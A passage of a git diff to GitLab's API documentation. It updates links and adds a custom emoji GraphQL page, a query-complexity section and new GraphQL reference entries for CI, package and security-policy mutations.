-28,7 +28,7 @@ GET /projects/:id/feature_flags | Attribute | Type | Required | Description | | ------------------- | ---------------- | ---------- | --------------------------------------------------------------------------------------------------------------------------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding). | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding). | | `scope` | string | no | The condition of feature flags, one of: `enabled`, `disabled`. | ```shell @@ -98,7 +98,7 @@ GET /projects/:id/feature_flags/:feature_flag_name | Attribute | Type | Required | Description | | ------------------- | ---------------- | ---------- | ---------------------------------------------------------------------------------------| -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding). | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding). | | `feature_flag_name` | string | yes | The name of the feature flag. | ```shell @@ -142,13 +142,13 @@ POST /projects/:id/feature_flags | Attribute | Type | Required | Description | | ------------------- | ---------------- | ---------- | ---------------------------------------------------------------------------------------| -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding). | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding). | | `name` | string | yes | The name of the feature flag. | | `version` | string | yes | The version of the feature flag. Must be `new_version_flag`. Omit or set to `legacy_flag` to create a [Legacy Feature Flag](feature_flags_legacy.md). | | `description` | string | no | The description of the feature flag. | | `active` | boolean | no | The active state of the flag. Defaults to true. [Supported](https://gitlab.com/gitlab-org/gitlab/-/merge_requests/38350) in GitLab 13.3 and later. | | `strategies` | JSON | no | The feature flag [strategies](../operations/feature_flags.md#feature-flag-strategies). | -| `strategies:name` | JSON | no | The strategy name. Can be `default`, `gradualRolloutUserId`, `userWithId`, or `gitlabUserList`. In [GitLab 13.5](https://gitlab.com/gitlab-org/gitlab/-/issues/36380) and later, can be [`flexibleRollout`](https://docs.getunleash.io/docs/activation_strategy#flexiblerollout). | +| `strategies:name` | JSON | no | The strategy name. Can be `default`, `gradualRolloutUserId`, `userWithId`, or `gitlabUserList`. In [GitLab 13.5](https://gitlab.com/gitlab-org/gitlab/-/issues/36380) and later, can be [`flexibleRollout`](https://docs.getunleash.io/activation_strategy/#flexiblerollout). | | `strategies:parameters` | JSON | no | The strategy parameters. | | `strategies:scopes` | JSON | no | The scopes for the strategy. | | `strategies:scopes:environment_scope` | string | no | The environment spec for the scope. | @@ -203,7 +203,7 @@ PUT /projects/:id/feature_flags/:feature_flag_name | Attribute | Type | Required | Description | | ------------------- | ---------------- | ---------- | ---------------------------------------------------------------------------------------| -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding). | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding). | | `feature_flag_name` | string | yes | The current name of the feature flag. | | `description` | string | no | The description of the feature flag. | | `active` | boolean | no | The active state of the flag. [Supported](https://gitlab.com/gitlab-org/gitlab/-/merge_requests/38350) in GitLab 13.3 and later. | @@ -278,7 +278,7 @@ DELETE /projects/:id/feature_flags/:feature_flag_name | Attribute | Type | Required | Description | | ------------------- | ---------------- | ---------- | ---------------------------------------------------------------------------------------| -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding). | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding). | | `feature_flag_name` | string | yes | The name of the feature flag. | ```shell diff --git a/doc/api/freeze_periods.md b/doc/api/freeze_periods.md index 50f1fe9f12b..454d2dfb1c5 100644 --- a/doc/api/freeze_periods.md +++ b/doc/api/freeze_periods.md @@ -26,7 +26,7 @@ GET /projects/:id/freeze_periods | Attribute | Type | Required | Description | | ------------- | -------------- | -------- | ----------------------------------------------------------------------------------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding). | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding). | Example request: @@ -59,7 +59,7 @@ GET /projects/:id/freeze_periods/:freeze_period_id | Attribute | Type | Required | Description | | ------------- | -------------- | -------- | ----------------------------------------------------------------------------------- | -| `id` | integer or string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding). | +| `id` | integer or string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding). | | `freeze_period_id` | string | yes | The database ID of the Freeze Period. | Example request: @@ -91,7 +91,7 @@ POST /projects/:id/freeze_periods | Attribute | Type | Required | Description | | -------------------| --------------- | -------- | -------------------------------------------------------------------------------------------------------------------------------- | -| `id` | integer or string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding). | +| `id` | integer or string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding). | | `freeze_start` | string | yes | Start of the Freeze Period in [cron](https://crontab.guru/) format. | | `freeze_end` | string | yes | End of the Freeze Period in [cron](https://crontab.guru/) format. | | `cron_timezone` | string | no | The timezone for the cron fields, defaults to UTC if not provided. | @@ -127,7 +127,7 @@ PUT /projects/:id/freeze_periods/:tag_name | Attribute | Type | Required | Description | | ------------- | --------------- | -------- | ----------------------------------------------------------------------------------------------------------- | -| `id` | integer or string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding). | +| `id` | integer or string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding). | | `freeze_period_id` | integer or string | yes | The database ID of the Freeze Period. | | `freeze_start` | string | no | Start of the Freeze Period in [cron](https://crontab.guru/) format. | | `freeze_end` | string | no | End of the Freeze Period in [cron](https://crontab.guru/) format. | @@ -164,7 +164,7 @@ DELETE /projects/:id/freeze_periods/:freeze_period_id | Attribute | Type | Required | Description | | ------------- | -------------- | -------- | ----------------------------------------------------------------------------------- | -| `id` | integer or string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding). | +| `id` | integer or string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding). | | `freeze_period_id` | string | yes | The database ID of the Freeze Period. | Example request: diff --git a/doc/api/geo_nodes.md b/doc/api/geo_nodes.md index 7926aeeeed7..42cf40d62b8 100644 --- a/doc/api/geo_nodes.md +++ b/doc/api/geo_nodes.md @@ -741,7 +741,7 @@ GET /geo_nodes/current/failures | `type` | string | no | Type of failed objects (`repository`/`wiki`) | | `failure_type` | string | no | Type of failures (`sync`/`checksum_mismatch`/`verification`) | -This endpoint uses [Pagination](README.md#pagination). +This endpoint uses [Pagination](index.md#pagination). ```shell curl --header "PRIVATE-TOKEN: <your_access_token>" "https://primary.example.com/api/v4/geo_nodes/current/failures" diff --git a/doc/api/graphql/custom_emoji.md b/doc/api/graphql/custom_emoji.md new file mode 100644 index 00000000000..a4d0acda8e7 --- /dev/null +++ b/doc/api/graphql/custom_emoji.md @@ -0,0 +1,111 @@ +--- +stage: Plan +group: Project Management +info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://about.gitlab.com/handbook/engineering/ux/technical-writing/#assignments +--- + +# Use custom emojis with GraphQL **(FREE SELF)** + +> - [Introduced](https://gitlab.com/gitlab-org/gitlab/-/merge_requests/37911) in GitLab 13.6 +> - [Deployed behind a feature flag](../../user/feature_flags.md), disabled by default. +> - Enabled on GitLab.com. +> - Recommended for production use. +> - To use in GitLab self-managed instances, ask a GitLab administrator to [enable it](#enable-or-disable-custom-emoji-api). **(FREE SELF)** + +This in-development feature might not be available for your use. There can be +[risks when enabling features still in development](../../user/feature_flags.md#risks-when-enabling-features-still-in-development). +Refer to this feature's version history for more details. + +To use custom emoji in comments and descriptions, you can add them to a group using the GraphQL API. + +Parameters: + +| Attribute | Type | Required | Description | +| :----------- | :------------- | :--------------------- | :------------------------------------------------------------------------ | +| `group_path` | integer/string | **{check-circle}** Yes | ID or [URL-encoded path of the group](../index.md#namespaced-path-encoding) | +| `name` | string | **{check-circle}** Yes | Name of the custom emoji. | +| `file` | string | **{check-circle}** Yes | URL of the custom emoji image. | + +## Create a custom emoji + +```graphql +mutation CreateCustomEmoji($groupPath: ID!) { + createCustomEmoji(input: {groupPath: $groupPath, name: "party-parrot", file: "https://cultofthepartyparrot.com/parrots/hd/parrot.gif", external: true}) { + clientMutationId + name + errors + } +} +``` + +After adding custom emoji to the group, members can use it in the same way as other emoji in the comments. + +## Get custom emoji for a group + +```graphql +query GetCustomEmoji($groupPath: ID!) { + group(fullPath: $groupPath) { + id + customEmoji { + nodes { + name + } + } + } +} +``` + +## Set up the GraphiQL explorer + +This procedure presents a substantive example that you can copy and paste into GraphiQL +explorer. GraphiQL explorer is available for: + +- GitLab.com users at [https://gitlab.com/-/graphql-explorer](https://gitlab.com/-/graphql-explorer). +- Self-managed users at `https://gitlab.example.com/-/graphql-explorer`. + +1. Copy the following code excerpt: + + ```graphql + query GetCustomEmoji { + group(fullPath: "gitlab-org") { + id + customEmoji { + nodes { + name, + url + } + } + } + } + ``` + +1. Open the [GraphiQL explorer tool](https://gitlab.com/-/graphql-explorer). +1. Paste the `query` listed above into the left window of your GraphiQL explorer tool. +1. Click Play to get the result shown here: + + + +For more information on: + +- GraphQL specific entities, such as Fragments and Interfaces, see the official + [GraphQL documentation](https://graphql.org/learn/). +- Individual attributes, see the [GraphQL API Resources](reference/index.md). + +## Enable or disable custom emoji API **(FREE SELF)** + +Custom emoji is under development and but ready for production use. It is +deployed behind a feature flag that is **disabled by default**. +[GitLab administrators with access to the GitLab Rails console](../../administration/feature_flags.md) +can enable it. + +To enable it: + +```ruby +Feature.enable(:custom_emoji) +``` + +To disable it: + +```ruby +Feature.disable(:custom_emoji) +``` diff --git a/doc/api/graphql/getting_started.md b/doc/api/graphql/getting_started.md index 85b36346167..5b482d15c51 100644 --- a/doc/api/graphql/getting_started.md +++ b/doc/api/graphql/getting_started.md @@ -8,7 +8,7 @@ info: To determine the technical writer assigned to the Stage/Group associated w This guide demonstrates basic usage of the GitLab GraphQL API. -Read the [GraphQL API style guide](../../development/api_graphql_styleguide.md) +Read the [GraphQL API style guide](../../development/api_graphql_styleguide.md) for implementation details aimed at developers who wish to work on developing the API itself. @@ -141,7 +141,7 @@ More about queries: Authorization uses the same engine as the GitLab application (and GitLab.com). If you've signed in to GitLab and use GraphiQL, all queries are performed as you, the signed in user. For more information, read the -[GitLab API documentation](../README.md#authentication). +[GitLab API documentation](../index.md#authentication). ### Mutations @@ -298,6 +298,24 @@ query IssueTypes { More about introspection: [GraphQL documentation](https://graphql.org/learn/introspection/) +### Query complexity + +The calculated [complexity score and limit](index.md#max-query-complexity) for a query can be revealed to clients by +querying for `queryComplexity`. + +```graphql +query { + queryComplexity { + score + limit + } + + project(fullPath: "gitlab-org/graphql-sandbox") { + name + } +} +``` + ## Sorting Some of the GitLab GraphQL endpoints allow you to specify how to sort a diff --git a/doc/api/graphql/img/custom_emoji_query_example.png b/doc/api/graphql/img/custom_emoji_query_example.png Binary files differnew file mode 100644 index 00000000000..2caccd6cd10 --- /dev/null +++ b/doc/api/graphql/img/custom_emoji_query_example.png diff --git a/doc/api/graphql/index.md b/doc/api/graphql/index.md index 073f5faf57c..b7a82dba7e9 100644 --- a/doc/api/graphql/index.md +++ b/doc/api/graphql/index.md @@ -76,6 +76,8 @@ These changes include the removal or renaming of fields, arguments or other part In these situations, GitLab follows a [Deprecation and removal process](#deprecation-and-removal-process) where the deprecated part of the schema is supported for a period of time before being removed. +There are some changes which are explicitly [not considered breaking](../../development/contributing/#breaking-changes). + Clients should familiarize themselves with the process to avoid breaking changes affecting their integrations. WARNING: @@ -99,7 +101,6 @@ The process is as follows: [GraphQL API Reference](reference/index.md) and in introspection queries. 1. Removals are announced at least one release prior in the [Deprecations](https://about.gitlab.com/handbook/marketing/blog/release-posts/#deprecations) section of the release post (at or prior to `X.11` and `X.5` releases). - release post (at or prior to `X.11` and `X.5` releases). 1. Items meeting criteria are removed in `X.0` or `X.6` and added to: - The [Removals](https://about.gitlab.com/handbook/marketing/blog/release-posts/#removals) section of the Release Post. @@ -165,7 +166,7 @@ The complexity of a single query is limited to a maximum of: - `200` for unauthenticated requests. - `250` for authenticated requests. -There is no way to discover the complexity of a query except by exceeding the limit. +The complexity score of a query and limit for the request [can be queried for](getting_started.md#query-complexity). If a query exceeds the complexity limit an error message response will be returned. diff --git a/doc/api/graphql/reference/index.md b/doc/api/graphql/reference/index.md index ffdf0ea5fd3..db93accc86a 100644 --- a/doc/api/graphql/reference/index.md +++ b/doc/api/graphql/reference/index.md @@ -52,6 +52,7 @@ Returns [`CiConfig`](#ciconfig). | <a id="queryciconfigcontent"></a>`content` | [`String!`](#string) | Contents of `.gitlab-ci.yml`. | | <a id="queryciconfigdryrun"></a>`dryRun` | [`Boolean`](#boolean) | Run pipeline creation simulation, or only do static check. | | <a id="queryciconfigprojectpath"></a>`projectPath` | [`ID!`](#id) | The project of the CI config. | +| <a id="queryciconfigsha"></a>`sha` | [`String`](#string) | Sha for the pipeline. | ### `Query.containerRepository` @@ -285,9 +286,15 @@ four standard [pagination arguments](#connection-pagination-arguments): | <a id="queryprojectssort"></a>`sort` | [`String`](#string) | Sort order of results. | | <a id="queryprojectstopics"></a>`topics` | [`[String!]`](#string) | Filters projects by topics. | +### `Query.queryComplexity` + +Information about the complexity of the GraphQL query. + +Returns [`QueryComplexity`](#querycomplexity). + ### `Query.runner` -Find a runner. Available only when feature flag `runner_graphql_query` is enabled. +Find a runner. Available only when feature flag `runner_graphql_query` is enabled. This flag is enabled by default. Returns [`CiRunner`](#cirunner). @@ -324,7 +331,7 @@ Returns [`RunnerSetup`](#runnersetup). ### `Query.runners` -Find runners visible to the current user. Available only when feature flag `runner_graphql_query` is enabled. +Find runners visible to the current user. Available only when feature flag `runner_graphql_query` is enabled. This flag is enabled by default. Returns [`CiRunnerConnection`](#cirunnerconnection). @@ -779,6 +786,46 @@ Input type: `CiCdSettingsUpdateInput` | <a id="mutationcicdsettingsupdateclientmutationid"></a>`clientMutationId` | [`String`](#string) | A unique identifier for the client performing the mutation. | | <a id="mutationcicdsettingsupdateerrors"></a>`errors` | [`[String!]!`](#string) | Errors encountered during execution of the mutation. | +### `Mutation.ciJobTokenScopeAddProject` + +Input type: `CiJobTokenScopeAddProjectInput` + +#### Arguments + +| Name | Type | Description | +| ---- | ---- | ----------- | +| <a id="mutationcijobtokenscopeaddprojectclientmutationid"></a>`clientMutationId` | [`String`](#string) | A unique identifier for the client performing the mutation. | +| <a id="mutationcijobtokenscopeaddprojectprojectpath"></a>`projectPath` | [`ID!`](#id) | The project that the CI job token scope belongs to. | +| <a id="mutationcijobtokenscopeaddprojecttargetprojectpath"></a>`targetProjectPath` | [`ID!`](#id) | The project to be added to the CI job token scope. | + +#### Fields + +| Name | Type | Description | +| ---- | ---- | ----------- | +| <a id="mutationcijobtokenscopeaddprojectcijobtokenscope"></a>`ciJobTokenScope` | [`CiJobTokenScopeType`](#cijobtokenscopetype) | The CI job token's scope of access. | +| <a id="mutationcijobtokenscopeaddprojectclientmutationid"></a>`clientMutationId` | [`String`](#string) | A unique identifier for the client performing the mutation. | +| <a id="mutationcijobtokenscopeaddprojecterrors"></a>`errors` | [`[String!]!`](#string) | Errors encountered during execution of the mutation. | + +### `Mutation.ciJobTokenScopeRemoveProject` + +Input type: `CiJobTokenScopeRemoveProjectInput` + +#### Arguments + +| Name | Type | Description | +| ---- | ---- | ----------- | +| <a id="mutationcijobtokenscoperemoveprojectclientmutationid"></a>`clientMutationId` | [`String`](#string) | A unique identifier for the client performing the mutation. | +| <a id="mutationcijobtokenscoperemoveprojectprojectpath"></a>`projectPath` | [`ID!`](#id) | The project that the CI job token scope belongs to. | +| <a id="mutationcijobtokenscoperemoveprojecttargetprojectpath"></a>`targetProjectPath` | [`ID!`](#id) | The project to be removed from the CI job token scope. | + +#### Fields + +| Name | Type | Description | +| ---- | ---- | ----------- | +| <a id="mutationcijobtokenscoperemoveprojectcijobtokenscope"></a>`ciJobTokenScope` | [`CiJobTokenScopeType`](#cijobtokenscopetype) | The CI job token's scope of access. | +| <a id="mutationcijobtokenscoperemoveprojectclientmutationid"></a>`clientMutationId` | [`String`](#string) | A unique identifier for the client performing the mutation. | +| <a id="mutationcijobtokenscoperemoveprojecterrors"></a>`errors` | [`[String!]!`](#string) | Errors encountered during execution of the mutation. | + ### `Mutation.clusterAgentDelete` Input type: `ClusterAgentDeleteInput` @@ -862,6 +909,30 @@ Input type: `CommitCreateInput` | <a id="mutationcommitcreatecontent"></a>`content` | [`[String!]`](#string) | Contents of the commit. | | <a id="mutationcommitcreateerrors"></a>`errors` | [`[String!]!`](#string) | Errors encountered during execution of the mutation. | +### `Mutation.configureDependencyScanning` + +Configure Dependency Scanning for a project by enabling Dependency Scanning in a new or modified +`.gitlab-ci.yml` file in a new branch. The new branch and a URL to +create a Merge Request are a part of the response. + +Input type: `ConfigureDependencyScanningInput` + +#### Arguments + +| Name | Type | Description | +| ---- | ---- | ----------- | +| <a id="mutationconfiguredependencyscanningclientmutationid"></a>`clientMutationId` | [`String`](#string) | A unique identifier for the client performing the mutation. | +| <a id="mutationconfiguredependencyscanningprojectpath"></a>`projectPath` | [`ID!`](#id) | Full path of the project. | + +#### Fields + +| Name | Type | Description | +| ---- | ---- | ----------- | +| <a id="mutationconfiguredependencyscanningbranch"></a>`branch` | [`String`](#string) | Branch that has the new/modified `.gitlab-ci.yml` file. | +| <a id="mutationconfiguredependencyscanningclientmutationid"></a>`clientMutationId` | [`String`](#string) | A unique identifier for the client performing the mutation. | +| <a id="mutationconfiguredependencyscanningerrors"></a>`errors` | [`[String!]!`](#string) | Errors encountered during execution of the mutation. | +| <a id="mutationconfiguredependencyscanningsuccesspath"></a>`successPath` | [`String`](#string) | Redirect path to use when the response is successful. | + ### `Mutation.configureSast` Configure SAST for a project by enabling SAST in a new or modified @@ -1050,7 +1121,7 @@ Input type: `CreateComplianceFrameworkInput` ### `Mutation.createCustomEmoji` -Available only when feature flag `custom_emoji` is enabled. +Available only when feature flag `custom_emoji` is enabled. This flag is disabled by default, because the feature is experimental and is subject to change without notice. Input type: `CreateCustomEmojiInput` @@ -1834,6 +1905,24 @@ Input type: `DestroyNoteInput` | <a id="mutationdestroynoteerrors"></a>`errors` | [`[String!]!`](#string) | Errors encountered during execution of the mutation. | | <a id="mutationdestroynotenote"></a>`note` | [`Note`](#note) | The note after mutation. | +### `Mutation.destroyPackage` + +Input type: `DestroyPackageInput` + +#### Arguments + +| Name | Type | Description | +| ---- | ---- | ----------- | +| <a id="mutationdestroypackageclientmutationid"></a>`clientMutationId` | [`String`](#string) | A unique identifier for the client performing the mutation. | +| <a id="mutationdestroypackageid"></a>`id` | [`PackagesPackageID!`](#packagespackageid) | ID of the Package. | + +#### Fields + +| Name | Type | Description | +| ---- | ---- | ----------- | +| <a id="mutationdestroypackageclientmutationid"></a>`clientMutationId` | [`String`](#string) | A unique identifier for the client performing the mutation. | +| <a id="mutationdestroypackageerrors"></a>`errors` | [`[String!]!`](#string) | Errors encountered during execution of the mutation. | + ### `Mutation.destroySnippet` Input type: `DestroySnippetInput` @@ -2554,7 +2643,7 @@ Input type: `IssueSetWeightInput` | <a id="mutationissuesetweightclientmutationid"></a>`clientMutationId` | [`String`](#string) | A unique identifier for the client performing the mutation. | | <a id="mutationissuesetweightiid"></a>`iid` | [`String!`](#string) | The IID of the issue to mutate. | | <a id="mutationissuesetweightprojectpath"></a>`projectPath` | [`ID!`](#id) | The project the issue to mutate is in. | -| <a id="mutationissuesetweightweight"></a>`weight` | [`Int!`](#int) | The desired weight for the issue. | +| <a id="mutationissuesetweightweight"></a>`weight` | [`Int`](#int) | The desired weight for the issue. If set to null, weight is removed. | #### Fields @@ -3298,7 +3387,7 @@ Input type: `PrometheusIntegrationResetTokenInput` | Name | Type | Description | | ---- | ---- | ----------- | | <a id="mutationprometheusintegrationresettokenclientmutationid"></a>`clientMutationId` | [`String`](#string) | A unique identifier for the client performing the mutation. | -| <a id="mutationprometheusintegrationresettokenid"></a>`id` | [`PrometheusServiceID!`](#prometheusserviceid) | The ID of the integration to mutate. | +| <a id="mutationprometheusintegrationresettokenid"></a>`id` | [`IntegrationsPrometheusID!`](#integrationsprometheusid) | The ID of the integration to mutate. | #### Fields @@ -3319,7 +3408,7 @@ Input type: `PrometheusIntegrationUpdateInput` | <a id="mutationprometheusintegrationupdateactive"></a>`active` | [`Boolean`](#boolean) | Whether the integration is receiving alerts. | | <a id="mutationprometheusintegrationupdateapiurl"></a>`apiUrl` | [`String`](#string) | Endpoint at which Prometheus can be queried. | | <a id="mutationprometheusintegrationupdateclientmutationid"></a>`clientMutationId` | [`String`](#string) | A unique identifier for the client performing the mutation. | -| <a id="mutationprometheusintegrationupdateid"></a>`id` | [`PrometheusServiceID!`](#prometheusserviceid) | The ID of the integration to mutate. | +| <a id="mutationprometheusintegrationupdateid"></a>`id` | [`IntegrationsPrometheusID!`](#integrationsprometheusid) | The ID of the integration to mutate. | #### Fields @@ -3529,7 +3618,7 @@ Input type: `RepositionImageDiffNoteInput` ### `Mutation.runnerDelete` -Available only when feature flag `runner_graphql_query` is enabled. +Available only when feature flag `runner_graphql_query` is enabled. This flag is enabled by default. Input type: `RunnerDeleteInput` @@ -3549,7 +3638,7 @@ Input type: `RunnerDeleteInput` ### `Mutation.runnerUpdate` -Available only when feature flag `runner_graphql_query` is enabled. +Available only when feature flag `runner_graphql_query` is enabled. This flag is enabled by default. Input type: `RunnerUpdateInput` @@ -3564,6 +3653,8 @@ Input type: `RunnerUpdateInput` | <a id="mutationrunnerupdateid"></a>`id` | [`CiRunnerID!`](#cirunnerid) | ID of the runner to update. | | <a id="mutationrunnerupdatelocked"></a>`locked` | [`Boolean`](#boolean) | Indicates the runner is locked. | | <a id="mutationrunnerupdatemaximumtimeout"></a>`maximumTimeout` | [`Int`](#int) | Maximum timeout (in seconds) for jobs processed by the runner. | +| <a id="mutationrunnerupdateprivateprojectsminutescostfactor"></a>`privateProjectsMinutesCostFactor` | [`Float`](#float) | Private projects' "minutes cost factor" associated with the runner (GitLab.com only). | +| <a id="mutationrunnerupdatepublicprojectsminutescostfactor"></a>`publicProjectsMinutesCostFactor` | [`Float`](#float) | Public projects' "minutes cost factor" associated with the runner (GitLab.com only). | | <a id="mutationrunnerupdaterununtagged"></a>`runUntagged` | [`Boolean`](#boolean) | Indicates the runner is able to run untagged jobs. | | <a id="mutationrunnerupdatetaglist"></a>`tagList` | [`[String!]`](#string) | Tags associated with the runner. | @@ -3577,7 +3668,7 @@ Input type: `RunnerUpdateInput` ### `Mutation.runnersRegistrationTokenReset` -Available only when feature flag `runner_graphql_query` is enabled. +Available only when feature flag `runner_graphql_query` is enabled. This flag is enabled by default. Input type: `RunnersRegistrationTokenResetInput` @@ -3597,6 +3688,65 @@ Input type: `RunnersRegistrationTokenResetInput` | <a id="mutationrunnersregistrationtokenreseterrors"></a>`errors` | [`[String!]!`](#string) | Errors encountered during execution of the mutation. | | <a id="mutationrunnersregistrationtokenresettoken"></a>`token` | [`String`](#string) | The runner token after mutation. | +### `Mutation.scanExecutionPolicyCommit` + +Input type: `ScanExecutionPolicyCommitInput` + +#### Arguments + +| Name | Type | Description | +| ---- | ---- | ----------- | +| <a id="mutationscanexecutionpolicycommitclientmutationid"></a>`clientMutationId` | [`String`](#string) | A unique identifier for the client performing the mutation. | +| <a id="mutationscanexecutionpolicycommitoperationmode"></a>`operationMode` | [`MutationOperationMode!`](#mutationoperationmode) | Changes the operation mode. | +| <a id="mutationscanexecutionpolicycommitpolicyyaml"></a>`policyYaml` | [`String!`](#string) | YAML snippet of the policy. | +| <a id="mutationscanexecutionpolicycommitprojectpath"></a>`projectPath` | [`ID!`](#id) | Full path of the project. | + +#### Fields + +| Name | Type | Description | +| ---- | ---- | ----------- | +| <a id="mutationscanexecutionpolicycommitbranch"></a>`branch` | [`String`](#string) | Name of the branch to which the policy changes are committed. | +| <a id="mutationscanexecutionpolicycommitclientmutationid"></a>`clientMutationId` | [`String`](#string) | A unique identifier for the client performing the mutation. | +| <a id="mutationscanexecutionpolicycommiterrors"></a>`errors` | [`[String!]!`](#string) | Errors encountered during execution of the mutation. | + +### `Mutation.securityPolicyProjectAssign` + +Input type: `SecurityPolicyProjectAssignInput` + +#### Arguments + +| Name | Type | Description | +| ---- | ---- | ----------- | +| <a id="mutationsecuritypolicyprojectassignclientmutationid"></a>`clientMutationId` | [`String`](#string) | A unique identifier for the client performing the mutation. | +| <a id="mutationsecuritypolicyprojectassignprojectpath"></a>`projectPath` | [`ID!`](#id) | Full path of the project. | +| <a id="mutationsecuritypolicyprojectassignsecuritypolicyprojectid"></a>`securityPolicyProjectId` | [`ProjectID!`](#projectid) | ID of the security policy project. | + +#### Fields + +| Name | Type | Description | +| ---- | ---- | ----------- | +| <a id="mutationsecuritypolicyprojectassignclientmutationid"></a>`clientMutationId` | [`String`](#string) | A unique identifier for the client performing the mutation. | +| <a id="mutationsecuritypolicyprojectassignerrors"></a>`errors` | [`[String!]!`](#string) | Errors encountered during execution of the mutation. | + +### `Mutation.securityPolicyProjectCreate` + +Input type: `SecurityPolicyProjectCreateInput` + +#### Arguments + +| Name | Type | Description | +| ---- | ---- | ----------- | +| <a id="mutationsecuritypolicyprojectcreateclientmutationid"></a>`clientMutationId` | [`String`](#string) | A unique identifier for the client performing the mutation. | +| <a id="mutationsecuritypolicyprojectcreateprojectpath"></a>`projectPath` | [`ID!`](#id) | Full path of the project. | + +#### Fields + +| Name | Type | Description | +| ---- | ---- | ----------- | +| <a id="mutationsecuritypolicyprojectcreateclientmutationid"></a>`clientMutationId` | [`String`](#string) | A unique identifier for the client performing the mutation. | +| <a id="mutationsecuritypolicyprojectcreateerrors"></a>`errors` | [`[String!]!`](#string) | Errors encountered during execution of the mutation. | +| <a id="mutationsecuritypolicyprojectcreateproject"></a>`project` | [`Project`](#project) | Security Policy Project that was created. | + ### `Mutation.terraformStateDelete` Input type: `TerraformStateDeleteInput` @@ -7345,7 +7495,8 @@ four standard [pagination arguments](#connection-pagination-arguments): | <a id="boardepicancestorsenddate"></a>`endDate` **{warning-solid}** | [`Time`](#time) | **Deprecated** in 13.5. Use timeframe.end. | | <a id="boardepicancestorsiid"></a>`iid` | [`ID`](#id) | IID of the epic, e.g., "1". | | <a id="boardepicancestorsiidstartswith"></a>`iidStartsWith` | [`String`](#string) | Filter epics by IID for autocomplete. | -| <a id="boardepicancestorsiids"></a>`iids` | [`[ID!]`](#id) | List of IIDs of epics, e.g., [1, 2]. | +| <a id="boardepicancestorsiids"></a>`iids` | [`[ID!]`](#id) | List of IIDs of epics, e.g., `[1, 2]`. | +| <a id="boardepicancestorsin"></a>`in` | [`[IssuableSearchableField!]`](#issuablesearchablefield) | Specify the fields to perform the search in. Defaults to `[TITLE, DESCRIPTION]`. Requires the `search` argument. | | <a id="boardepicancestorsincludeancestorgroups"></a>`includeAncestorGroups` | [`Boolean`](#boolean) | Include epics from ancestor groups. | | <a id="boardepicancestorsincludedescendantgroups"></a>`includeDescendantGroups` | [`Boolean`](#boolean) | Include epics from descendant groups. | | <a id="boardepicancestorslabelname"></a>`labelName` | [`[String!]`](#string) | Filter epics by labels. | @@ -7377,7 +7528,8 @@ four standard [pagination arguments](#connection-pagination-arguments): | <a id="boardepicchildrenenddate"></a>`endDate` **{warning-solid}** | [`Time`](#time) | **Deprecated** in 13.5. Use timeframe.end. | | <a id="boardepicchildreniid"></a>`iid` | [`ID`](#id) | IID of the epic, e.g., "1". | | <a id="boardepicchildreniidstartswith"></a>`iidStartsWith` | [`String`](#string) | Filter epics by IID for autocomplete. | -| <a id="boardepicchildreniids"></a>`iids` | [`[ID!]`](#id) | List of IIDs of epics, e.g., [1, 2]. | +| <a id="boardepicchildreniids"></a>`iids` | [`[ID!]`](#id) | List of IIDs of epics, e.g., `[1, 2]`. | +| <a id="boardepicchildrenin"></a>`in` | [`[IssuableSearchableField!]`](#issuablesearchablefield) | Specify the fields to perform the search in. Defaults to `[TITLE, DESCRIPTION]`. Requires the `search` argument. | | <a id="boardepicchildrenincludeancestorgroups"></a>`includeAncestorGroups` | [`Boolean`](#boolean) | Include epics from ancestor groups. | | <a id="boardepicchildrenincludedescendantgroups"></a>`includeDescendantGroups` | [`Boolean`](#boolean) | Include epics from descendant groups. | | <a id="boardepicchildrenlabelname"></a>`labelName` | [`[String!]`](#string) | Filter epics by labels. | @@ -7506,6 +7658,7 @@ Represents the total number of issues and their weights for a particular day. | Name | Type | Description | | ---- | ---- | ----------- | +| <a id="cibuildneedid"></a>`id` | [`ID!`](#id) | ID of the job we need to complete. | | <a id="cibuildneedname"></a>`name` | [`String`](#string) | Name of the job we need to complete. | ### `CiConfig` @@ -7581,6 +7734,7 @@ Represents the total number of issues and their weights for a particular day. | Name | Type | Description | | ---- | ---- | ----------- | | <a id="cigroupdetailedstatus"></a>`detailedStatus` | [`DetailedStatus`](#detailedstatus) | Detailed status of the group. | +| <a id="cigroupid"></a>`id` | [`String!`](#string) | ID for a group. | | <a id="cigroupjobs"></a>`jobs` | [`CiJobConnection`](#cijobconnection) | Jobs in group. (see [Connections](#connections)) | | <a id="cigroupname"></a>`name` | [`String`](#string) | Name of the job group. | | <a id="cigroupsize"></a>`size` | [`Int`](#int) | Size of the group. | @@ -7614,7 +7768,7 @@ Represents the total number of issues and their weights for a particular day. | <a id="cijobrefpath"></a>`refPath` | [`String`](#string) | Path to the ref. | | <a id="cijobretryable"></a>`retryable` | [`Boolean!`](#boolean) | Indicates the job can be retried. | | <a id="cijobscheduledat"></a>`scheduledAt` | [`Time`](#time) | Schedule for the build. | -| <a id="cijobschedulingtype"></a>`schedulingType` | [`String`](#string) | Type of pipeline scheduling. Value is `dag` if the pipeline uses the `needs` keyword, and `stage` otherwise. | +| <a id="cijobschedulingtype"></a>`schedulingType` | [`String`](#string) | Type of 